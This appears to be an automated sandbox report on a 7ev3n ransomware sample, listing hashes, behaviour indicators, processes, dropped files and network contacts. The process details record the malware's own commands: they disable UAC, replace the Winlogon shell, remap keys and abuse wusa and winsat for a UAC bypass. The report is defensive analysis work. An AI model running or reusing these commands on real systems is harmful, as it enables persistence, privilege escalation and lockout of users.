File name:

Ransomware.7ev3n.zip

Full analysis: https://app.any.run/tasks/cf679f26-2f69-4630-8cae-87c494dd418b
Verdict: Malicious activity
Analysis date: June 04, 2024, 17:28:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
MD5:

71F4666373DB57958635DE89EDB58A65

SHA1:

71B4504062E2C0C08B03E39387633FB068705DA7

SHA256:

72810CDF913169DF2B42ABAF2D34840CA04B91D640B778CA2580F744BE1DAA1D

SSDEEP:

6144:4CXgeVc8YG8ekHKb4s1pNLAsqbzZFRWqe:4CXgeVc8DjkHDKpusqRFRWqe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 3964)
      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • uac.exe (PID: 1876)

    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 2284)

    • Changes the login/logoff helper path in the registry

      • reg.exe (PID: 2448)

    • Creates a writable file in the system directory

      • wusa.exe (PID: 1604)

    • Changes the autorun value in the registry

      • reg.exe (PID: 2340)

    • UAC/LUA settings modification

      • reg.exe (PID: 1044)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3964)
      • Ransomware.7ev3n.exe (PID: 4004)
      • uac.exe (PID: 1876)
      • system.exe (PID: 1852)

    • The process creates files with name similar to system file names

      • Ransomware.7ev3n.exe (PID: 4004)

    • Executable content was dropped or overwritten

      • Ransomware.7ev3n.exe (PID: 4004)
      • uac.exe (PID: 1876)
      • system.exe (PID: 1020)
      • wusa.exe (PID: 1604)

    • Reads the Internet Settings

      • Ransomware.7ev3n.exe (PID: 4004)
      • uac.exe (PID: 1876)
      • cmd.exe (PID: 336)
      • system.exe (PID: 1852)

    • Starts itself from another location

      • Ransomware.7ev3n.exe (PID: 4004)

    • The executable file from the user directory is run by the CMD process

      • uac.exe (PID: 1876)

    • Process drops legitimate windows executable

      • uac.exe (PID: 1876)
      • wusa.exe (PID: 1604)

    • Starts CMD.EXE for commands execution

      • uac.exe (PID: 1876)
      • system.exe (PID: 1020)
      • system.exe (PID: 1852)

    • Executing commands from a ".bat" file

      • system.exe (PID: 1020)
      • system.exe (PID: 1852)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1936)
      • cmd.exe (PID: 2080)
      • cmd.exe (PID: 2172)
      • cmd.exe (PID: 1804)
      • cmd.exe (PID: 1676)
      • cmd.exe (PID: 2524)
      • cmd.exe (PID: 2692)

  • INFO

    • Checks supported languages

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • uac.exe (PID: 1876)
      • system.exe (PID: 1852)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3964)

    • Creates files or folders in the user directory

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • system.exe (PID: 1852)

    • Reads the machine GUID from the registry

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • system.exe (PID: 1852)

    • Reads the computer name

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • uac.exe (PID: 1876)
      • system.exe (PID: 1852)

    • Checks proxy server information

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1852)

    • Create files in a temporary directory

      • uac.exe (PID: 1876)

    • Drops the executable file immediately after the start

      • wusa.exe (PID: 1604)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Unknown (99)
ZipModifyDate: 2019:10:10 18:33:38
ZipCRC: 0xfaa96043
ZipCompressedSize: 146680
ZipUncompressedSize: 322560
ZipFileName: Ransomware.7ev3n.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
80
Monitored processes
30
Malicious processes
5
Suspicious processes
5

Behavior graph

Click at the process to see the details
start winrar.exe ransomware.7ev3n.exe system.exe cmd.exe no specs cmd.exe no specs uac.exe cmd.exe no specs wusa.exe no specs wusa.exe no specs wusa.exe winsat.exe no specs winsat.exe system.exe cmd.exe no specs cmd.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs reg.exe reg.exe no specs reg.exe reg.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
336"C:\Windows\System32\cmd.exe" /c wusa C:\Users\admin\AppData\Local\Temp\ellocnak.msu /extract:%windir%\system32\sysprepC:\Windows\System32\cmd.exeuac.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
664REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
752cmd.exe /c C:\Users\admin\AppData\Local\uac.exe 32 C:\Users\admin\AppData\Local\system.exeC:\Windows\System32\cmd.exesystem.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1020"C:\Users\admin\AppData\Local\system.exe"C:\Users\admin\AppData\Local\system.exe
Ransomware.7ev3n.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\admin\appdata\local\system.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
1036C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\del.batC:\Windows\System32\cmd.exesystem.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1044REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1424"C:\Windows\system32\sysprep\winsat.exe" C:\Windows\System32\sysprep\winsat.exeuac.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows System Assessment Tool
Exit code:
3221226540
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\sysprep\winsat.exe
c:\windows\system32\ntdll.dll
1604"C:\Windows\system32\wusa.exe" C:\Users\admin\AppData\Local\Temp\ellocnak.msu /extract:C:\Windows\system32\sysprepC:\Windows\System32\wusa.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Update Standalone Installer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wusa.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1676C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64C:\Windows\System32\cmd.exesystem.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1804C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\admin\AppData\Local\system.exe" /f /reg:64C:\Windows\System32\cmd.exesystem.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
6 619
Read events
6 494
Write events
110
Delete events
15

Modification events

(PID) Process:(3964) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3964) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3964) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3964) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3964) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3964) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3964) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Ransomware.7ev3n.zip
(PID) Process:(3964) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3964) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3964) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
9
Suspicious files
42
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
4004Ransomware.7ev3n.exeC:\Users\admin\AppData\Local\system.exeexecutable
MD5:9F8BC96C96D43ECB69F883388D228754
SHA256:7D373CCB96D1DBB1856EF31AFA87C2112A0C1795A796AB01CB154700288AFEC5
1876uac.exeC:\Users\admin\AppData\Local\Temp\emc7E5A.tmpbinary
MD5:C049AC4B753B53C51EAFDBF5A77AD54E
SHA256:8457508294FACA764A33CE788C3F6B1A35C02A3A602A3A904E45156998A6A44B
1604wusa.exeC:\Windows\System32\sysprep\powrprof.dllexecutable
MD5:F035352F9FDA534E2BF8417EFDED77DC
SHA256:150E78743248CAF78E1972A293B7AA18CF219F146CEF7B5771A76B51A9829D3A
1604wusa.exeC:\Windows\System32\sysprep\winsat.exeexecutable
MD5:886B0EAA3B0FE76B3204E687C8DA6F66
SHA256:B007057E6728C7E954CAEB45EAE0ADCD1C027DCB160746CCD2E78F91D18CCF80
1876uac.exeC:\Users\admin\AppData\Local\Temp\winsat.exeexecutable
MD5:886B0EAA3B0FE76B3204E687C8DA6F66
SHA256:B007057E6728C7E954CAEB45EAE0ADCD1C027DCB160746CCD2E78F91D18CCF80
1876uac.exeC:\Users\admin\AppData\Local\Temp\emc7E5C.tmpbinary
MD5:C049AC4B753B53C51EAFDBF5A77AD54E
SHA256:8457508294FACA764A33CE788C3F6B1A35C02A3A602A3A904E45156998A6A44B
1604wusa.exeC:\Windows\Logs\DPX\setupact.logtext
MD5:3F0BF0FDADF0B6B9C0E8F54B46E27A14
SHA256:2760AD99788126637D1C033211E9E22A86101B1755CE60B7D84AF2F65BAA6C58
1876uac.exeC:\Users\admin\AppData\Local\Temp\emc7E5D.tmpbinary
MD5:A7F30B548064E90EB78A31EA25365C62
SHA256:886F45A01E33622362828D49D0EDAADD59D8760A0581095B42916055059B50A4
1876uac.exeC:\Users\admin\AppData\Local\Temp\emc7E59.tmpbinary
MD5:4FC49E1A0F83A21BDC5E34B62EEB0D62
SHA256:DAFC9806A73EC7652F24F11477A71681AA82A20C56CB752943A39E360CD794A6
1852system.exeC:\Users\admin\Desktop\introductionmaps.jpgbinary
MD5:0BA417E4AD4639ADA3D764DEFDC39960
SHA256:AD04677A6BBAC68B9A5692FC21D34A7346C78BC5AF953018232693CCB65D5F7A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
8
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
unknown
224.0.0.252:5355
unknown
4004
Ransomware.7ev3n.exe
104.16.236.243:443
blockchain.info
CLOUDFLARENET
unknown
1852
system.exe
49.13.77.253:80
jaster.in
Hetzner Online GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
blockchain.info
  • 104.16.236.243
  • 104.16.237.243
unknown
jaster.in
  • 49.13.77.253
unknown
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
Process
Message
uac.exe
[UCM] Dll dropped successfully
winsat.exe
Akagi letter found
winsat.exe
C:\Users\admin\AppData\Local\system.exe
winsat.exe
Fubuki at your service.
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Ransomware.7ev3n.zip